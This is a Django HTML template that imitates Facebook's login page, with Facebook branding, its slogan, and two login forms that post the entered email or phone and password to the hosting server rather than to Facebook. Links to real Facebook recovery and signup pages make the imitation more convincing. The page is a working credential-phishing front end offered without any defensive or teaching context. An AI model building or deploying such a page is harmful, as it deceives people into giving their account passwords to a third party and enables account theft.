{%load static%}
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
   <!-- CSS -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/css/bootstrap.min.css">


{% comment %} 
    <link rel="stylesheet"   type="text/css"    href="{% static 'project/css/bootstrap.min.css'%}"> {% endcomment %}
    <style>
        input{
            width: 100%;
            height : 45px;
            margin-top: 10px;
            background-color: rgb(246,246,246);
            border-color: rgb(123,147,159);
           
        }
        ::placeholder{
            float: left;
            font-size: 17px;
            margin-top: 10px;
            margin-left: 10px;
            color: rgb(51, 77, 100);
          
          
        }
        a{
            text-decoration: none;
            color : white ;
        }
        button{
            width: 100%;
            height : 45px;
            margin-top: 10px;
            background-color: rgb(246,246,246);
           

        }

        @media  screen and (max-width: 768px){

            #d{
                display: none;
            }
            #n{
                display: none;
            }
               #k{
                margin-right: 20px;
                font-size: 13px;
               }
               #a{
                margin-right: 20px;
                font-size: 21px;
               }
               #b{
                margin-right: 20px;
                font-size: 21px;
               }

        }

        @media  screen and (max-width: 1400px) {
            #d{
                display: none;
            }
            #n{
                display: none;
            }
               #k{
                margin-right: 20px;
                font-size: 13px;
               }
               #a{
                margin-right: 20px;
                font-size: 21px;
               }
               #b{
                margin-right: 20px;
                font-size: 21px;
               }
        }


        @media  screen and (max-width: 1200px) {
            #d{
                display: none;
            }
            #n{
                display: none;
            }
               #k{
                margin-right: 20px;
                font-size: 13px;
               }
               #a{
                margin-right: 20px;
                font-size: 21px;
               }
               #b{
                margin-right: 20px;
                font-size: 21px;
               }
        }


        @media  screen and (max-width: 992px) {
            #d{
                display: none;
            }
            #n{
                display: none;
            }
               #k{
                margin-right: 20px;
                font-size: 13px;
               }
               #a{
                margin-right: 20px;
                font-size: 21px;
               }
               #b{
                margin-right: 20px;
                font-size: 21px;
               }
        }




        @media  screen and (max-width: 768px) {
            #a{
                display: none;
            }
            #b{
                display: none;
            }
            #c{
               display: none;
             
            }
            #d{
                font-size: 50px;
                display: inline;
            }
            #f{
                margin-top: 10px;
                margin-right: 100px;
                display: none;
            }
            #k{
                display: none;
            }
            #n{
                display: block;
            }
         
        }

     
    </style>
</head>
<body style="background-color: rgb(231,232,236) ;">

    <div class="container">
        <div class="row">
            <div class="  col-12 col-md-6 ">
                <div class="row">   <h1 style="font-size: 55px; color: rgb(30,119,235);  margin-top: 185px; margin-left: 135px;" >
                    <b id="c">facebook</b> </h1> </div>
               <div class="row">     <label style="color:rgb(55,55,55); font-size: 24px; margin-left: 135px;"  > 
                    
                <b id="a"> Facebook helps you connect and share </b> </label> </div>
               <div class="row">     <label style="color:rgb(55,55,55); font-size: 24px; margin-left: 135px;"> 
                
                <b id="b"> with the people in your life </b> </label></div>
               
            </div>
           
            <div class="col-12 col-md-6">
                 <h1 style="font-size: 55px; color: rgb(30,119,235);   margin-left: 100px; margin-top: 0px;"  >
                    <b id="d">facebook</b> </h1>
                    
                    <div class="card" id="f" style="width: 25rem; background-color: rgb(244,244,244); height: 370px; margin-top: 125px;  border-radius: 3%; margin-left: 70px; " >
                        <div class="card-body" >
                            <p id="l" style="text-align: center; font-size: 20px;">Log in Facebook</p>
                          
                            <form method='POST'>
                              {% csrf_token %}
                           
                            <input type="email" placeholder="Email address or phone number" style="float: right "  name="username">
                           <br>
                            
                           <input type="password" placeholder="Password"name="password" style="float: right ">
                            <br>
                           <button type="submit" role = 'button'  href ='https://www.facebook.com/'  style="float: right ; background-color: rgb(30,119,235) ; color: white;  ">
                           Log in
                         
                            </button>
                           <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" >Forgotten password ?</a>
                           <p style="text-align: center;">Or</p>
                           <hr>
                         <center>   <button style="background-color: rgb(68, 170, 43); margin-top: 0px; width:50%;"> <a  href="https://www.facebook.com/reg/"> Create new account</a> </button>   </center>
                           
                            </form>
                        </div>
             
              
                    </div>
    
                    <div class="card" id="n" style="width: 25rem; background-color: rgb(244,244,244); height: 370px; margin-top: 25px;  border-radius: 3%; margin-left: 0px; " >
                        <div class="card-body" >
                            <p id="l" style="text-align: center; font-size: 20px;">Log in Facebook</p>
                          
                            <form method='POST'>
                                {% csrf_token %}
                           
                            <input type="email" placeholder="Email address or phone number" style="float: right "  name="username">
                           <br>
                            
                           <input type="password" placeholder="Password"name="password" style="float: right ">
                            <br>
                           <button type="submit" role = 'button'  href ='https://www.facebook.com/'  style="float: right ; background-color: rgb(30,119,235) ; color: white;  ">
                           Log in
                         
                            </button>
                           <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" >Forgotten password ?</a>
                           <p style="text-align: center;">Or</p>
                           <hr>
                         <center>   <button style="background-color: rgb(68, 170, 43); margin-top: 0px; width:50%;"> <a  href="https://www.facebook.com/reg/"> Create new account</a> </button>   </center>
                           
                            </form>
                        </div>
             
              
                    </div>
    
                    <br>
                     <h6 style="margin-left: 95px;" id="k">   Create a Page for a celebrity, brand or business. </h6> 
        </div>
            
        </div>
    </div>
    </div>
    
    
    
  

    {% comment %} <script src="{% static 'js/bootstrap.bundle.js'%}"></script> {% endcomment %}

    <!-- JavaScript -->
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>






